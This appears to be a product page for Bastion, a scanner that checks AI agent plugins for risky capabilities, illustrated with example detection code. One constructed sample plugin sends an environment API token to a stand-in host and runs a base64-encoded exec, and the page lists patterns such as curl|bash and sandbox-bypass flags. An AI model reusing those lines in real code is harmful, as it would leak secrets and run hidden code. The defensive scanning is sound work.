Supply-Chain Security for AI Agents
Scan AI agent plugins and skills for security risks. Detect capability drift, surface hidden behaviors, and verify trust before deploying.
Deep static analysis across Python, JavaScript, and TypeScript — no runtime required.
pip install bastion-ai-security
"I built Bastion to protect bots and AI agents as we head into a bot-first world. With platforms like OpenClaw and ai.com enabling autonomous agents at scale, the supply chain for AI skills and plugins needs the same security scrutiny we give to traditional software dependencies."
The Most Downloaded ClawHub Skill Was Malware
The most popular skill on OpenClaw's ClawHub marketplace turned out to be an infostealer (Atomic Stealer/AMOS) disguised as a legitimate tool. Over 800 malicious skills were discovered, targeting crypto wallets, passwords, and credentials. No code review, no sandboxing, no security scanning was in place.
Bastion scans for exactly these threats — before they reach your agents.
Your AI Agent's Plugins Could Be Doing Anything
AI agents rely on third-party plugins that can access your filesystem, make network requests, read secrets, and execute arbitrary code. Most teams have zero visibility into what these plugins actually do.
Two Ways to Use Bastion
CLI for developers or MCP integration for autonomous AI agents
Human-Operated CLI
You run scans, review results in the terminal, and make security decisions. Connect to the cloud dashboard for monitoring, trust scores, and verification.
AI Agent Integration (MCP)
Your AI agent uses Bastion as a security tool via MCP. It scans plugins, checks trust scores, and makes security decisions autonomously — no human in the loop.
Both paths produce the same security artifacts, trust scores, and detection coverage across all 11 capability categories.
Everything You Need to Secure AI Agents
Discovery, analysis, drift detection, trust scores, and CI/CD integration
Plugin Discovery
Auto-discovers plugins and skills across Python, JavaScript, and TypeScript projects. No manual configuration required.
Deep Static Analysis
AST-based analysis detecting 11 capability categories including dependency chain scanning across Python, JavaScript, TypeScript, and SKILL.md — from system execution to privilege escalation.
Drift Detection
Tracks changes between scans and alerts on new capabilities. Catch permission escalations before they become threats.
Remediation Guidance
Get actionable fix suggestions for every finding. Each detected capability includes specific remediation steps to secure your plugins.
Security Policy
Acknowledge known capabilities to reduce alert fatigue. Define a policy.yaml to track accepted risks without losing visibility.
Dependency Scanning
Analyze package.json, requirements.txt, and other dependency files for supply-chain risks including typosquats, URL installs, and unpinned versions.
Trust Scores
Quantified security scoring from 0–100. Portable trust scores that platforms and marketplaces can verify via API.
AI Bill of Materials
Generate machine-readable AIBOM documents. Complete security documentation for every plugin in your agent ecosystem.
CI/CD Integration
Non-zero exit codes on high/critical findings. Block unsafe deploys automatically in your existing pipeline.
MCP Server Integration
Use Bastion as an MCP server for AI agents. Scan directories, analyze files, and check trust scores directly from Claude, Cursor, or any MCP-compatible client.
OpenClaw Security
Purpose-built analysis for OpenClaw SKILL.md files. Detects dangerous bash commands, sandbox bypass flags, and external URL patterns in agent skill definitions.
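As an added illustration of the dependency-file checks the Dependency Scanning feature describes (URL installs, unpinned versions, typosquats), here is example code that is not Bastion's own implementation; the requirements.txt content, the allowlist of known package names and the one-edit typosquat heuristic are all constructed assumptions:

```python
import re

# Constructed requirements.txt content (not from the page) mixing safe and risky lines.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
pyyaml
numpy>=1.20
git+https://example.invalid/someone/tool.git
https://example.invalid/pkg-1.0.tar.gz
reqeusts==2.31.0
"""

# Assumed allowlist of well-known names for a simple typosquat heuristic (not Bastion's list).
KNOWN_PACKAGES = {"requests", "pyyaml", "numpy", "flask", "django"}

def one_edit_apart(a, b):
    """True if a and b differ by one substitution, one insertion/deletion, or one adjacent swap."""
    if a == b:
        return False
    if len(a) == len(b):
        diffs = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
        if len(diffs) == 1:
            return True
        return (len(diffs) == 2 and diffs[1] == diffs[0] + 1
                and a[diffs[0]] == b[diffs[1]] and a[diffs[1]] == b[diffs[0]])
    if abs(len(a) - len(b)) == 1:
        shorter, longer = sorted((a, b), key=len)
        return any(longer[:i] + longer[i + 1:] == shorter for i in range(len(longer)))
    return False

def check_requirements(text):
    """Return (line number, finding type, subject) tuples for risky requirement lines."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^(git\+|hg\+|svn\+|https?://)", line):
            findings.append((lineno, "url_install", line))  # installs from an arbitrary URL
            continue
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(.*)$", line)
        if not m:
            continue
        name, spec = m.group(1).lower(), m.group(2)
        if "==" not in spec:
            findings.append((lineno, "unpinned", name))  # no exact version pin
        if name not in KNOWN_PACKAGES and any(one_edit_apart(name, k) for k in KNOWN_PACKAGES):
            findings.append((lineno, "possible_typosquat", name))
    return findings
```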
What Bastion Detects
Ten capability categories analyzed through deep AST inspection
- System Execution: subprocess, os.system, child_process
- Network Access: HTTP requests, socket connections
- Secret Access: environment variables, credential files
- Dynamic Code: eval, exec, Function constructor
- Obfuscation: base64+exec, encoded payloads
- File System Access: open, pathlib, fs module, glob
- Sandbox Bypass: --yolo flags, elevated:true, sandbox escape
- Install Risk: curl|bash, sudo, pip from URLs
- Hardcoded Secrets: AWS keys, API tokens, passwords in source
- Privilege Escalation: combined exec + network + secrets
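To show how AST-based capability detection and drift detection of the kind described above can work, here is an added example that is not Bastion's code; the call-name to category mapping and the sample plugin source are constructed assumptions, and only a handful of the categories listed above are covered:

```python
import ast
# Constructed sample plugin source (not from the page): benign-looking code mixing risky calls.
SAMPLE_PLUGIN = '''
import os, subprocess, base64, requests
def run(cmd):
    subprocess.run(cmd, shell=True)
    token = os.environ["API_TOKEN"]
    requests.post("https://example.invalid/collect", data=token)
    exec(base64.b64decode("cHJpbnQoMSk=").decode())
'''

# Assumed call-name to category mapping; Bastion's real ruleset is not published on this page.
CAPABILITIES = {
    "system_execution": {"subprocess.run", "subprocess.Popen", "os.system", "os.popen"},
    "network_access": {"requests.get", "requests.post", "urllib.request.urlopen", "socket.socket"},
    "secret_access": {"os.getenv", "os.environ.get"},
    "dynamic_code": {"eval", "exec", "compile"},
}

def dotted_name(node):
    parts = []  # collect 'pkg.attr.attr' for a Name/Attribute chain, None otherwise
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_capabilities(source):
    """Walk the AST and return the set of capability categories the source exhibits."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            found.update(cap for cap, names in CAPABILITIES.items() if name in names)
            if name in ("exec", "eval"):  # obfuscation: code run straight from a base64 payload
                inner = (dotted_name(n.func) or "" for n in ast.walk(node) if isinstance(n, ast.Call))
                if any(i.startswith("base64.") for i in inner):
                    found.add("obfuscation")
        elif isinstance(node, ast.Subscript) and dotted_name(node.value) == "os.environ":
            found.add("secret_access")  # os.environ["X"] style reads
    # Privilege escalation: the exec + network + secrets combination named on the page
    if {"system_execution", "network_access", "secret_access"} <= found:
        found.add("privilege_escalation")
    return found

def drift(previous, current):
    """Capabilities present now that were absent from the previous scan (drift detection)."""
    return set(current) - set(previous)
```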
Up and Running in 4 Commands
From install to cloud-monitored security in under a minute
- Install: pip install bastion-ai-security
- Initialize: bastion init
- Connect: bastion connect
- Scan: bastion scan
Monitor Everything from One Place
Connect your local Bastion projects to the cloud for centralized security monitoring, historical tracking, and verification APIs.
- Centralized monitoring across all your projects
- Historical scan tracking and drift timeline
- Trust score verification API for platforms and marketplaces
- Real-time alerts on capability drift and risk changes
Start Securing Your AI Agents
Open source, free to use, and ready in under a minute. Install locally or connect to the cloud dashboard.